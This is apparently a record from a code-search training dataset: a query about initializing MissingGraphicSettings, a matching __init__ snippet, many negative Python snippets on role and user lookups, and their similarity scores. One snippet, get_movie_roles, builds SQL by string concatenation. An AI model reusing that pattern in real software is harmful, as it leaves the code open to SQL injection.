check your input file!\")", "def fusion_api_get_roles(self, uri=None, param='', api=None, headers=None):\n return self.roles.get(uri=uri, api=api, headers=headers, param=param)", "def get_route_by_id(self, route_id):\n route = self.admin_repository.get_route_by_id(route_id)\n if route:\n print('''Route Id: {}\\nRoute: {}\\n\n '''.format(route[0], route[1]))\n return route\n else:\n print(\"Invalid Route Id\")\n return False", "def get_principals(self, role_id):", "def load_user(id):\n return Admin.query.get(int(id))", "def update_role(self, role_id, name: str) -> Role | None:\n role = self.get_session.get(self.role_model, role_id)\n if not role:\n return None\n try:\n role.name = name\n self.get_session.merge(role)\n self.get_session.commit()\n log.info(const.LOGMSG_INF_SEC_UPD_ROLE.format(role))\n except Exception as e:\n log.error(const.LOGMSG_ERR_SEC_UPD_ROLE.format(e))\n self.get_session.rollback()\n return None\n return role", "def get(self, _id):", "def get_by_id(cls, id):\n return db.session.query(cls).get(id)", "def get(self, id):\n resultado = EmployeeModel.query.filter_by(employee_id=id).first()\n if resultado:\n return resultado\n api.abort(404)", "def get(self, id):\n return self.__model__.query.get(id)", "def single_role(self):\n return None", "def role_arn_lookup(session, role_name):\n if session is None:\n return None\n\n client = session.client('iam')\n response = client.get_role(RoleName=role_name)\n if response is None:\n return None\n else:\n return response['Role']['Arn']", "def get(self, id, timeout=None):\n req = RoleAttachmentGetRequest()\n\n req.id = (id)\n tries = 0\n plumbing_response = None\n while True:\n try:\n plumbing_response = self.stub.Get(\n req,\n metadata=self.parent.get_metadata('RoleAttachments.Get',\n req),\n timeout=timeout)\n except Exception as e:\n if self.parent.shouldRetry(tries, e):\n tries += 1\n self.parent.jitterSleep(tries)\n continue\n raise plumbing.convert_error_to_porcelain(e) from e\n break\n\n resp = models.RoleAttachmentGetResponse()\n resp.meta = plumbing.convert_get_response_metadata_to_porcelain(\n plumbing_response.meta)\n resp.role_attachment = plumbing.convert_role_attachment_to_porcelain(\n plumbing_response.role_attachment)\n resp.rate_limit = plumbing.convert_rate_limit_metadata_to_porcelain(\n plumbing_response.rate_limit)\n return resp", "def find(self, id):\n response = self._connection.session.get(self.url + \"/%s\" % id)\n return self._raise_or_return_json(response)", "def get_by_id(self, id):\n return self.session.query(User).filter_by(id=id).first()", "def get_movie_roles(movie_id):\n\n cnx,cur = connect_to_db() #get connection with db\n cur.execute(\"SELECT DISTINCT role FROM movie_crew WHERE movie_id = \" + movie_id )\n lst = cur.fetchall()\n cur.close()\n cnx.close()\n return lst", "def get_room_by_id(self, id):\n if not isinstance(id, int):\n id = int(id)\n if self.rooms.has_key(id):\n return self.rooms[id]\n raise RuntimeError, \"Room not known\"", "def get_single_user(self, id):\n for user in self.users:\n if user['id'] == id:\n return user", "def get_by_id(self, id: int):\n\n\t\traise NotImplemented", "def get(self, id):\n return Matstamm.find_by_id(id)", "def _get_role_uuid_by_name(keystone, name):\n\n role_UUID = None\n roles_list = keystone.roles.list()\n\n for role in roles_list:\n if role.name == name:\n role_UUID = role.id\n break\n\n if role_UUID is None:\n raise NameError('Specified role name not found')\n else:\n return role_UUID", "def find_resource(self, id, session):\n return 
session.query(self.User).filter_by(id=id).first()", "def token_role(self, role):\n return self.read('auth/token/roles/{0}'.format(role))", "def find_roles_by_id(self, role_ids: List[int]) -> List[Role]:\n query = self.get_session.query(Role).filter(Role.id.in_(role_ids))\n return query.all()", "def get(self, id):\n tmp = userDao.get_one_entry(id)\n return tmp", "def get_account_by_id(self, id_):\n return next((account for account in self.accounts\n if account.id == id_), None)", "def getRoles(self):", "def fetch_by_name(profile, name):\n params = {}\n params[\"profile\"] = profile\n response = utils.do_request(role_lib, \"get\", params)\n data = utils.get_data(\"Roles\", response)\n result = [x for x in data if x[\"RoleName\"] == name]\n return result", "def delete(self, id, timeout=None):\n req = RoleDeleteRequest()\n\n req.id = (id)\n tries = 0\n plumbing_response = None\n while True:\n try:\n plumbing_response = self.stub.Delete(\n req,\n metadata=self.parent.get_metadata('Roles.Delete', req),\n timeout=timeout)\n except Exception as e:\n if self.parent.shouldRetry(tries, e):\n tries += 1\n self.parent.jitterSleep(tries)\n continue\n raise plumbing.convert_error_to_porcelain(e) from e\n break\n\n resp = models.RoleDeleteResponse()\n resp.meta = plumbing.convert_delete_response_metadata_to_porcelain(\n plumbing_response.meta)\n resp.rate_limit = plumbing.convert_rate_limit_metadata_to_porcelain(\n plumbing_response.rate_limit)\n return resp", "def get_user(id):\n pass", "def delete_role(id):\r\n check_admin()\r\n\r\n role = Role.query.get_or_404(id)\r\n db.session.delete(role)\r\n db.session.commit()\r\n flash('You have successfully deleted the role.')\r\n\r\n # redirect to the roles page\r\n return redirect(url_for('admin.list_roles'))\r\n\r\n return render_template(title=\"Delete Role\")", "def edit_role(role_id, new_name=None, new_arn=None):\n\tsession = get_session()\n\told_data = get_role(role_id)\n\tdata = {}\n\tdata[\"name\"] = new_name or old_data[\"name\"]\n\tdata[\"arn\"] = new_arn or old_data[\"arn\"]\n\tresponse = session.put(\"{url}/api/roles/{role_id}\".format(url=get_registry_url(), role_id=role_id), json=data)\n\treturn response.json()" ]
[ "0.845486", "0.8306357", "0.8198853", "0.81536174", "0.8034468", "0.8029377", "0.77602434", "0.77323145", "0.7709774", "0.7558279", "0.7468724", "0.7445049", "0.7390456", "0.7355343", "0.7096366", "0.70292366", "0.6925993", "0.68034214", "0.6687161", "0.66808903", "0.66696924", "0.6654415", "0.6651892", "0.66412574", "0.65487653", "0.654516", "0.652529", "0.6512492", "0.6488081", "0.64753973", "0.63922274", "0.63716656", "0.63642764", "0.6346309", "0.6331621", "0.6316578", "0.62372684", "0.61865443", "0.6103885", "0.6089886", "0.6084827", "0.60697067", "0.60540545", "0.6047235", "0.60390997", "0.60233504", "0.60030377", "0.59972215", "0.5994126", "0.5994126", "0.599201", "0.5987439", "0.59696245", "0.59610575", "0.59580815", "0.5954522", "0.59412354", "0.5941112", "0.5940964", "0.59240067", "0.5909084", "0.59006286", "0.5893449", "0.5886986", "0.58796215", "0.5864522", "0.58520585", "0.58421016", "0.5832476", "0.5820839", "0.58187985", "0.5818058", "0.5795759", "0.5791157", "0.57870185", "0.5784493", "0.57758427", "0.57636684", "0.5757033", "0.57513654", "0.57446027", "0.5741854", "0.57414514", "0.5721447", "0.5718519", "0.57035786", "0.5702699", "0.5697638", "0.5693274", "0.56913996", "0.56707466", "0.56634843", "0.5660236", "0.5644013", "0.5642598", "0.5629763", "0.5619007", "0.56129175", "0.56098855", "0.559876" ]
0.7384984
13
Initializes MissingDictKeys with an error message.
def __init__(self, msg: str): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _initialize_error_dictionaries(self):\n for task_id in self.task_ids.keys():\n self.training_errors[task_id] = []\n self.validation_errors[task_id] = []", "def test_missing_mandatory(self):\n try:\n CollectorUpdate()\n self.assertFalse(\"RuntimeError expected\")\n except RuntimeError as exception:\n assert_that(str(exception), equal_to(\"Missing keys: 'stage', 'status', 'timestamp'\"))", "def test_from_empty_dict(self):\n from sosbeacon.event.message import Message\n\n self.assertRaisesRegexp(\n Exception, 'key is required', Message.from_dict, {})", "def testMissingKeys(self):\n self.assertRaises(ValueError,\n self.unauth.table,\n self.dataset,\n self.table)", "def test_throws_item_missing_key(self):\n with pytest.raises(marshmallow.ValidationError):\n Item.Schema().loads(json.dumps(item_missing_key))", "def _setErrorNodesDict(self, errorDict):\n self._errorDict = errorDict", "def test_set_missing_keys_1(self):\n data_dict = {\"type\":\"add\", \"cluster\":\"\"}\n key_set = set([\"type\", \"host_genus\"])\n tickets.set_missing_keys(data_dict, key_set)\n with self.subTest():\n self.assertEqual(len(data_dict.keys()), 3)\n with self.subTest():\n self.assertEqual(data_dict[\"host_genus\"], \"\")", "def init_failed_tests_dict():\n global g_failed_test_info_dict\n g_failed_tests_info_dict[\"TestName\"] = []\n g_failed_tests_info_dict[\"TestInfo\"] = []", "def _add_missing_keys(self):\n for k, v in self.defaults.items():\n if k not in self.data:\n self.data[k] = v\n\n self.save()", "def __missing__(self, key):\n global MISSING\n MISSING = key # For debugging - save name of missing key\n return INVALID", "def test_dict_with_invalid_version(self):\n\n invalid_version_info = (-1, -1, -1)\n d = LexicalDictionary(invalid_version_info)\n\n with self.assertRaises(FileNotFoundError):\n lp = Lexpp(external_dict=d)", "def test_set_key_filename_missing(self):\n command_line = self._MENU + [self._KEYNAME, \"--keyfile-path\", \"/bogus\"]\n self.check_error(StratisCliKeyfileNotFoundError, command_line, _ERROR)", "def _KeyMissing(side):\n return 'Key missing from %s' % side", "def test_init_errors(self):\n t = self.Test({})\n self.assertEqual(t.errors, {})", "def test_set_missing_keys_2(self):\n data_dict = {\"type\":\"add\", \"cluster\":\"\"}\n key_set = set([\"type\", \"cluster\"])\n tickets.set_missing_keys(data_dict, key_set)\n self.assertEqual(len(data_dict.keys()), 2)", "def test_ERRORS(self):\n self.assertIsInstance(constants.ERRORS, dict,\n \"constants.ERRORS must be a dictionary.\")", "def test_keys_failure(self):\n storage = Storage()\n storage._keys_dict = {'1': 'one',\n 'abc': '1'}\n self.assertRaises(StoragePatternError, storage.keys, 'ab[cd')", "def test_missing_entry_raises_KeyError(self):\n with self.assertRaises(KeyError):\n self.phonebook.lookup(\"missing\")", "def test_incorrect_init(self):\n with self.assertRaises(MissingMarkersException) as context:\n self.subject()", "def test_getitem_missing(self, env: yaenv.Env):\n with pytest.raises(yaenv.EnvError) as err:\n _ = env['MISSING']\n assert 'Missing' in str(err.value)", "def provoke_and_handle_KeyError():\n test_dict = {}\n try:\n print(test_dict['to life'])\n except KeyError as ke:\n print(f\"Sorry! 
The key '{ke}' does not exist in test_dict!\")", "def initialize(self, keys: List[str]):", "def test_init(self):\n # test invalid normalized_items\n with self.assertRaisesRegex(\n KeyError, \"Should be one of 'bbox', 'head', 'torso'\"):\n MpiiPCKAccuracy(norm_item='invalid')", "def addErrorNodesDict(self, errorDict):\n self.errorDict.update(errorDict)", "def initializeFromDict(self, inputDict):\n pass", "def test_init(self):\n # test invalid normalized_items\n with self.assertRaisesRegex(\n KeyError, \"Should be one of 'bbox', 'head', 'torso'\"):\n JhmdbPCKAccuracy(norm_item='invalid')", "def test_map_missing_key_encountered():\n with pytest.raises(KeyError):\n Map().read_key(10, b\"\")", "def test_overwrite_raises_an_error_by_default(self):\n set_default_for_missing_keys('test')\n\n with pytest.raises(ValueError) as e:\n set_default_for_missing_keys(None)\n\n # confirm that error message correctly indicates the fix/resolution\n assert 'pass `overwrite=True`' in str(e.value)", "def _import_messagekeys(self, local_obj, msg_obj):\n\n # Aggregate MsgKey attributes into a dict.\n msg_dict = {'message': msg_obj.message,\n 'argcount': msg_obj.message.count('%s'),\n '_comps': local_obj._comps + [msg_obj.key],\n 'exception': msg_obj.exception,\n '_msgobj': msg_obj\n }\n\n # Create MessageKey Object and load its attributes\n msgkey_obj = self._MsgKey__class() # Dynamically created in _createErrorMsgKeys()\n msgkey_obj._load(msg_dict)\n msgkey_obj._initialized = True\n\n\n # Assign it to parent LocalKey.\n setattr(local_obj, core_utils.convertAllCaps(msg_obj.key), msgkey_obj)", "def _check_initialized(self):\n self.assertEquals(0, self._error_count)\n self.assertEquals(0, len(self._error_messages))", "def keyError():\n d = {}\n d['cat']", "def __init__(self, msg, path_to_item=None, valid_classes=None,\n key_type=None):\n self.path_to_item = path_to_item\n self.valid_classes = valid_classes\n self.key_type = key_type\n full_msg = msg\n if path_to_item:\n full_msg = \"%s at %s\" % (msg, render_path(path_to_item))\n super(ApiTypeError, self).__init__(full_msg)", "def __init__(self, msg, path_to_item=None, valid_classes=None,\n key_type=None):\n self.path_to_item = path_to_item\n self.valid_classes = valid_classes\n self.key_type = key_type\n full_msg = msg\n if path_to_item:\n full_msg = \"{0} at {1}\".format(msg, render_path(path_to_item))\n super(ApiTypeError, self).__init__(full_msg)", "def __init__(self, msg, path_to_item=None, valid_classes=None,\n key_type=None):\n self.path_to_item = path_to_item\n self.valid_classes = valid_classes\n self.key_type = key_type\n full_msg = msg\n if path_to_item:\n full_msg = \"{0} at {1}\".format(msg, render_path(path_to_item))\n super(ApiTypeError, self).__init__(full_msg)", "def __init__(self, msg, path_to_item=None, valid_classes=None,\n key_type=None):\n self.path_to_item = path_to_item\n self.valid_classes = valid_classes\n self.key_type = key_type\n full_msg = msg\n if path_to_item:\n full_msg = \"{0} at {1}\".format(msg, render_path(path_to_item))\n super(ApiTypeError, self).__init__(full_msg)", "def test_init(self):\n person = Person('test_person_a')\n self.assertEqual(person.name, 'test_person_a')\n self.assertEqual(person.address, '123 Fake Street')\n self.assertEqual(person.email, 'test@example.com')\n\n with self.assertRaises(KeyError):\n Person('fake_person')", "def _add_error(self, key, message):\n if key not in self._error_key_list:\n self._error_key_list.append(key)\n self.add_error(key, str(message))", "def testBadKeys(self):\n # Ignore access to 
protected members\n # pylint: disable=W0212\n self.assertRaises(DOLAPI._DOLAPIError,\n self.badauth.table,\n self.dataset,\n self.table)", "def test_keyerror(self):\n try:\n self.db['foo']\n except KeyError, e:\n assert \"no key 'foo' in database <SequenceFileDB\" in str(e), str(e)", "def validate_required_keys(input_dict, filename, required_keys):\n passed = True\n for req_key in required_keys:\n if not input_dict.get(req_key):\n print(\"{}: missing required key {}\".format(filename, req_key))\n passed = False\n return passed", "def test_from_dict_bad_event_key(self):\n from google.appengine.ext import ndb\n\n from sosbeacon.event.event import Event\n from sosbeacon.event.message import Message\n\n event_key = ndb.Key(Event, 1)\n\n self.assertRaisesRegexp(\n Exception, \"Event not found\",\n Message.from_dict, {'event': event_key})", "def __missing__(self, key):\n raise KeyNotInContextError(f\"{key} not found in the pypyr context.\")", "def test_init(self):\n # test invalid normalized_items\n with self.assertRaisesRegex(\n KeyError, \"Should be one of 'bbox', 'head', 'torso'\"):\n PCKAccuracy(norm_item='invalid')", "def test_getitem_error(self):\n with self.assertRaises(KeyError):\n self.tester['Not_a_Sample']", "def test_getitem_error(self):\n with self.assertRaises(KeyError):\n self.tester['Not_a_Sample']", "def __init__(self, key, parent=None):\n if parent:\n msg = f\"Missing config while rendering {parent}: {key}\"\n else:\n msg = f\"Missing config: {key}\"\n super(MissingConfiguration, self).__init__(msg)", "def record_error(self, message, keys=None, type=None, **kwargs):\n keys = list(keys) if keys is not None else []\n self.errors.append(\n dict(\n message=message,\n keys=keys,\n type=type or EntityErrors.UNCATEGORIZED,\n **kwargs\n )\n )", "def check_initialized(self):\n for name, field in self.__by_name.items():\n value = getattr(self, name)\n if value is None:\n if field.required:\n raise ValidationError(\n \"Message %s is missing required field %s\" %\n (type(self).__name__, name))\n else:\n try:\n if (isinstance(field, MessageField) and\n issubclass(field.message_type, Message)):\n if field.repeated:\n for item in value:\n item_message_value = field.value_to_message(\n item)\n item_message_value.check_initialized()\n else:\n message_value = field.value_to_message(value)\n message_value.check_initialized()\n except ValidationError as err:\n if not hasattr(err, 'message_name'):\n err.message_name = type(self).__name__\n raise", "def _import_basekey(self, page_module, basekey):\n\n basepage_obj = getattr(page_module, basekey.lower())\n raw_dict = util._getErrmsgData(basepage_obj)\n\n attr, lcl_keys = raw_dict['attributes'], raw_dict['local_keys']\n\n basekey_dict = dict([(k, v) for k, v in attr] + # Load all Attributes\n zip(['_keys', '_comps'],\n [[core_utils.convertAllCaps(x[0]) for x in lcl_keys] or [], # local_keys\n [basekey]])) # components\n\n Basekey = self._BaseKey__class() # Dynamically created in _createErrorMsgKeys()\n\n Basekey._load(basekey_dict)\n\n # Assign BaseKey object to ErrMsg (self)\n setattr(self, basekey, Basekey)\n\n return Basekey, lcl_keys", "def testInitEmpty():\n conf = naiveConf.NaiveConf()\n with pytest.raises(KeyError):\n print conf.x\n conf.x = 5\n assert conf.x == 5", "def test_no_such_key():\n test = [{'key': 'val1'}, ['missing']]\n t_result = fetch_data_by_keys(*test)\n assert not is_successful(t_result)\n assert 'missing' in str(t_result.failure())", "def test_throws_base_price_missing_key(self):\n with 
pytest.raises(marshmallow.ValidationError):\n BasePrice.Schema().loads(json.dumps(base_price_missing_key))", "def _get_missing_keys(self):\n REQUIRED_KEYS = [\n 'date_purchased', 'cost', 'supply_type_id'\n ]\n\n return [key for key in REQUIRED_KEYS if not key in self.request.data]", "def on_init_fail(self, event_time, message):\n pass", "def test_raises_on_missing_needed_fields(self):\n test_name = \"impossible_creature_not_present\"\n self.form.constructor_fields = [*self.form.constructor_fields, test_name]\n message = \"The fields for email, username, and constructor must be set in fields. \"\n self.assertNotIn(test_name, self.form.base_fields)\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.confirm_required_fields()", "def test_init__no_sdk_key_no_datafile__fails(self, _):\n self.assertRaisesRegex(\n optimizely_exceptions.InvalidInputException,\n enums.Errors.MISSING_SDK_KEY,\n config_manager.PollingConfigManager,\n sdk_key=None,\n datafile=None,\n )", "def test_init_unknown_error(self):\n with self.assertRaises(QiitaDBUnknownIDError):\n PrepSample('Not_a_Sample', self.prep_template)", "def initializeDict():\n ret = libxml2mod.xmlInitializeDict()\n return ret", "def get_or_raise(self, key: str, error_message: str = None) -> str:\n v = self.get_or_default(key, None)\n if v is None:\n if error_message is None:\n print(\"Error, '\" + key + \"' is required.\")\n else:\n print(error_message)\n raise CLIMissingKeyError(error_message)\n\n else:\n return v", "def param_dict_initialization(self):\n return NotImplemented", "def test_set_invalid_key(test_file):\n md = OSXMetaData(test_file.name)\n with pytest.raises(KeyError):\n md[\"invalid_key\"] = \"value\"", "def test_get_invalid_key(self):\n pairs = {'library': '~/home/documents/dms',\n 'key': 'value',\n }\n exceptionKeys = ['Hello', 'spam']\n try:\n tempconfig = tempfile.NamedTemporaryFile(\n suffix=\".yaml\", delete=False)\n tempconfig.write('ham: eggs'.encode('UTF-8'))\n tempconfig.close()\n config = easydms.config.Config(tempconfig.name)\n\n for key, value in pairs.items():\n self.assertEqual(config.getKey(key, value), value)\n\n for key in exceptionKeys:\n with self.assertRaises(easydms.config.ErrorConfigKeyNotFound):\n config.getRequiredKey(key)\n finally:\n os.remove(tempconfig.name)", "def test_raises_if_initial_fieldsets_error(self):\n original_fieldsets = self.form.fieldsets\n test_fieldsets = (\n ('Your Name', {\n 'position': 1,\n 'fields': [('first_name', 'last_name', )],\n }),\n (None, {\n 'classes': ('counting', ),\n 'position': 2,\n 'fields': [\n ('first', 'second', ),\n 'last',\n ],\n }), )\n position_missing_fieldsets = deepcopy(test_fieldsets)\n del position_missing_fieldsets[1][1]['position']\n fields_missing_fieldsets = deepcopy(test_fieldsets)\n del fields_missing_fieldsets[0][1]['fields']\n message = \"There must be 'fields' and 'position' in each fieldset. 
\"\n self.form.fieldsets = position_missing_fieldsets\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.make_fieldsets()\n self.form.fieldsets = fields_missing_fieldsets\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.make_fieldsets()\n\n self.form.fieldsets = original_fieldsets", "def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict,\n missing_keys, unexpected_keys, error_msgs):\n module_names = ['backbone', 'neck', 'roi_head', 'rpn_head']\n for key in list(state_dict):\n for module_name in module_names:\n if key.startswith(module_name) and ('img_' +\n key) not in state_dict:\n state_dict['img_' + key] = state_dict.pop(key)\n\n super()._load_from_state_dict(state_dict, prefix, local_metadata,\n strict, missing_keys, unexpected_keys,\n error_msgs)", "def test_checkmarx_init_key_missing_error(self, mock_url_read, mock_error):\n # pylint: disable=protected-access\n mock_url_read.return_value = '{}'\n marx = Checkmarx(url='http://url', username='un', password='pwd') # nosec\n\n self.assertIsNotNone(marx)\n mock_url_read.assert_called_once_with(\n 'http://url/cxrestapi/auth/identity/connect/token',\n post_body=b'username=un&password=pwd&scope=sast_rest_api&grant_type=password&'\n b'client_id=resource_owner_client&client_secret=014DF517-39D1-4453-B7B3-9930C563627C')\n self.assertEqual(mock_error.call_args[0][0], \"Couldn't load access token from json: %s.\")\n self.assertIsInstance(mock_error.call_args[0][1], KeyError)\n self.assertEqual(ssl._create_default_https_context, ssl._create_unverified_context)", "def _initalize_mapping():\n linter = lint.PyLinter()\n linter.load_defaults()\n linter.load_default_plugins()\n\n mapping = {\n message.msgid: message.symbol\n for message in linter.msgs_store.messages\n }\n\n return mapping", "def test_wrong_init(self):\n xknx = XKNX()\n knxipframe = KNXIPFrame(xknx)\n with pytest.raises(AttributeError):\n knxipframe.init(23)\n\n with pytest.raises(CouldNotParseKNXIP):\n # this is not yet implemented in xknx\n knxipframe.init(KNXIPServiceType.SEARCH_REQUEST_EXTENDED)", "def _check_errors(self, json_loaded):\n\n content = json_loaded\n try:\n m = content[u'error'][u'message']\n c = content[u'error'][u'code']\n out= \"API Error code: {}\\nError message: {}\".format(c, m)\n raise InvalidQueryException(self.name, out)\n except KeyError:\n pass", "def _check_keys(setting_dict):\n for key in SettingContainer.key_list:\n if not key in setting_dict:\n raise Exception(\n f\"No value for {key} found in language-settings\")", "def test_load_non_existing_help_nc_params(self) -> None:\n with self.assertRaises(FileNotFoundError):\n load_help_nc_params(\"unknown_param\")", "def test_init_unknown_error(self):\n with self.assertRaises(QiitaDBUnknownIDError):\n SampleTemplate(2)", "def test_error_on_missing_application_key(self):\n parser = Configuration()\n exception = self.assertRaises(ConfigurationError,\n parser._applications_from_configuration,\n {})\n self.assertEqual(\n \"Application configuration has an error. 
\"\n \"Missing 'applications' key.\",\n exception.message\n )", "def init_matches_errors(self) -> None:\n\n self.matches = set()\n self.ignored = set()\n self.errors = set()", "def test_raise_on_missing_critical(self):\n name_for_field = 'absent_field'\n field_opts = {'names': (name_for_field, 'absent'), 'alt_field': '', 'computed': False}\n critical_fields = {'absent_field': field_opts}\n with self.assertRaises(ImproperlyConfigured):\n self.form.fields_for_critical(critical_fields)", "def setup_dict(data, required=None, defaults=None):\n required = required or []\n for i in set(required) - set(data):\n raise IndexError(\"Missed: %s\" % i)\n\n defaults = defaults or {}\n for i in set(data) - set(required) - set(defaults):\n raise ValueError(\"Unexpected: %s\" % i)\n\n defaults.update(data)\n return defaults", "def setup_dict(data, required=None, defaults=None):\n required = required or []\n for i in set(required) - set(data):\n raise IndexError(\"Missed: %s\" % i)\n\n defaults = defaults or {}\n for i in set(data) - set(required) - set(defaults):\n raise ValueError(\"Unexpected: %s\" % i)\n\n defaults.update(data)\n return defaults", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def testNotExistingPath(self):\n with h5py.File(self.h5_fname, 'a') as f:\n f['data'] = 1\n\n ddict = h5todict(self.h5_fname, path=\"/I/am/not/a/path\", errors='ignore')\n self.assertFalse(ddict)\n\n with LoggingValidator(dictdump_logger, error=1):\n ddict = h5todict(self.h5_fname, path=\"/I/am/not/a/path\", errors='log')\n self.assertFalse(ddict)\n\n with self.assertRaises(KeyError):\n h5todict(self.h5_fname, path=\"/I/am/not/a/path\", errors='raise')", "def validate_inputs(self, input_dict):\n required_keys = {\n 'start_delay_hours',\n 'mission_time_hours',\n 'critical_wind_speed_m_per_s',\n 'wind_height_of_interest_m',\n 'wind_shear_exponent',\n 'weather_window'\n }\n found_keys = set(input_dict.keys())\n if len(required_keys - found_keys) > 0:\n err_msg = '{}: did not find all required keys in inputs dictionary. Missing keys are {}'\n raise ValueError(err_msg.format(type(self).__name__, required_keys - found_keys))", "def test_init_unknown_error(self):\n with self.assertRaises(QiitaDBUnknownIDError):\n Sample('Not_a_Sample', self.sample_template)", "def __setup__(cls):\n super(Country, cls).__setup__()\n cls._error_messages.update({\n 'country_not_found': 'Country with ISO code %s does not exist.',\n })", "def _failOnMissingActiveNuclides(missingActiveNuclides):\n msg = \"Missing active nuclides in loading file. 
Add the following nuclides:\"\n for i, nucList in enumerate(missingActiveNuclides, 1):\n msg += \"\\n {} - \".format(i) # Index of\n for j, nuc in enumerate(nucList, 1):\n delimiter = \" or \" if j < len(nucList) else \"\"\n msg += \"{}{}\".format(nuc, delimiter)\n raise ValueError(msg)", "def __init__(self, cfg: RAW_CFG, keyvals: Mapping[str, Any], *args, **kwargs) -> None:\n super().__init__(cfg, *args, **kwargs)\n\n for k in self.INDEX_KEYS:\n if k not in keyvals:\n raise ConfigException(f\"Key value {k} missing from keyvals: {keyvals!r}\")\n self.keyvals = keyvals", "def test_init_unknown_error(self):\n with self.assertRaises(QiitaDBUnknownIDError):\n PrepTemplate(2)", "def error(self, key, **kwargs):\n try:\n msg = self.error_messages[key]\n except KeyError:\n class_name = self.__class__.__name__\n raise AssertionError('Error with key={} is not found for class={}'.format(key, class_name))\n message_string = msg.format(**kwargs)\n raise ValidationError(message_string, code=key)", "def init_dict(self, train_data, dict_ord=None):\n raise NotImplementedError()", "def dictionary_should_not_contain_key(self,dictionary,key,msg=None):\r\n default = \"Dictionary contains key '%s'\" %key\r\n _verify_condition(not dictionary.has_key(key),default,msg)", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def test_error_on_missing_version_key(self):\n config = dict(applications={})\n parser = Configuration()\n exception = self.assertRaises(ConfigurationError,\n parser._applications_from_configuration,\n config)\n self.assertEqual(\n \"Application configuration has an error. \"\n \"Missing 'version' key.\",\n exception.message\n )", "def _check_keys(dict):\n for key in dict.keys():\n if isinstance(dict[key], sio.matlab.mio5_params.mat_struct):\n dict[key] = _todict(dict[key])\n return dict", "def test_initialize_handles_errors(self):\n self.assertEqual(list(self.registry), [])\n\n item1 = self.DummyItem(123)\n item2 = self.DummyItem(123)\n\n with self.assertRaises(AlreadyRegisteredError):\n self.hook_cls(self.extension, [item1, item2])\n\n self.assertEqual(list(self.registry), [])", "def test_with_missing_required_fields(data_store_path, missing_fields):\n data_store = YAMLDataStore(file_path=str(data_store_path))\n user = {\"name\": \"Eric Idle\", \"phone\": \"123-456-7890\", \"address\": \"here\"}\n for missing_field in missing_fields:\n del user[missing_field]\n\n with pytest.raises(InvalidUserError) as error:\n data_store.create(user)\n\n error_msg = str(error.value)\n for missing_field in missing_fields:\n assert missing_field in error_msg", "def test_key_no_data(self):\n key = Key({})\n\n assert key.warning is None\n assert key.in_car is None", "def missing_data(self, data):\n missing_fields = []\n for key in data:\n if not key in request.json:\n missing_fields.append(key)\n if missing_fields:\n message = 'Missing ' + ', '.join(missing_fields)\n return self.bad_request(message)\n return None", "def __init__(self):\n try:\n # Use pkg_resources to support Windows and Unix file paths\n # and find relative module path for file\n file_to_open = resource_string(__name__, self.FILE)\n self.errors = json.loads(file_to_open)\n\n except ResolutionError as e:\n print(e)\n self.errors = dict()", "def test_get_invalid_key(test_file):\n md = OSXMetaData(test_file.name)\n with pytest.raises(KeyError):\n md[\"invalid_key\"]", "def test_process_args_should_reject_missing_units(self, arg_dict):\n with pytest.raises(KeyError):\n 
change_resolution.process_args(arg_dict)", "def test_blank_key(self):\n with self.assertRaises(ConfigError) as cm:\n imageroller.main.read_authconfig(\n imageroller.test.get_config_parser(self._blank_key))\n self.assertEqual(str(cm.exception), \"AuthConfig must contain ApiKey\")", "def missingvalue(message):\n raise jinja2.UndefinedError(message)", "def test_invalid_key(self):\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('221b=\"starts with number\"')\n assert 'Invalid key' in str(err.value)\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('_=\"not assignable\"')\n assert 'Invalid key' in str(err.value)\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('o-o=\"invalid character\"')\n assert 'Invalid key' in str(err.value)", "def test_get_error_data_table_when_no_errors(self):\n field_setup = None\n error_names = ['non-field_name', 'not_a_field']\n prepared_info = self.setup_error_data(field_setup, error_names, True)\n for row in prepared_info:\n self.assertEqual(row['expected'], row['actual'])" ]
[ "0.6115417", "0.6019149", "0.5846607", "0.58035153", "0.56639206", "0.56505346", "0.56354576", "0.56103414", "0.5606163", "0.5584499", "0.55501634", "0.5543524", "0.55091983", "0.55001175", "0.54870623", "0.5441635", "0.54101694", "0.5374049", "0.5367004", "0.5310237", "0.52992076", "0.52906936", "0.528019", "0.52739465", "0.52651757", "0.5261097", "0.5246999", "0.52468425", "0.52216613", "0.5209104", "0.52079844", "0.5206169", "0.52020687", "0.52020687", "0.52020687", "0.51985836", "0.5193266", "0.51240754", "0.51237833", "0.51077104", "0.509966", "0.5086445", "0.5063306", "0.5061311", "0.5061311", "0.50595224", "0.5039204", "0.5030843", "0.50282735", "0.50271875", "0.5013878", "0.50130737", "0.50099003", "0.498505", "0.49822018", "0.4980406", "0.49775887", "0.497435", "0.49448523", "0.49442324", "0.49388805", "0.4936826", "0.49344063", "0.49230748", "0.49217063", "0.49205714", "0.48937842", "0.48722747", "0.48712555", "0.48708254", "0.48598027", "0.48585424", "0.48583955", "0.48527047", "0.48523563", "0.48523563", "0.48429546", "0.48419335", "0.48374155", "0.483572", "0.48149192", "0.48146898", "0.48105952", "0.48097214", "0.48093045", "0.4801977", "0.48018736", "0.48013112", "0.47976455", "0.47966486", "0.47903576", "0.47861025", "0.47856033", "0.47756016", "0.47728083", "0.47687173", "0.47669154", "0.4765693", "0.47646478", "0.47603044", "0.47595772" ]
0.0
-1
Initializes MissingGraphicSettings with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
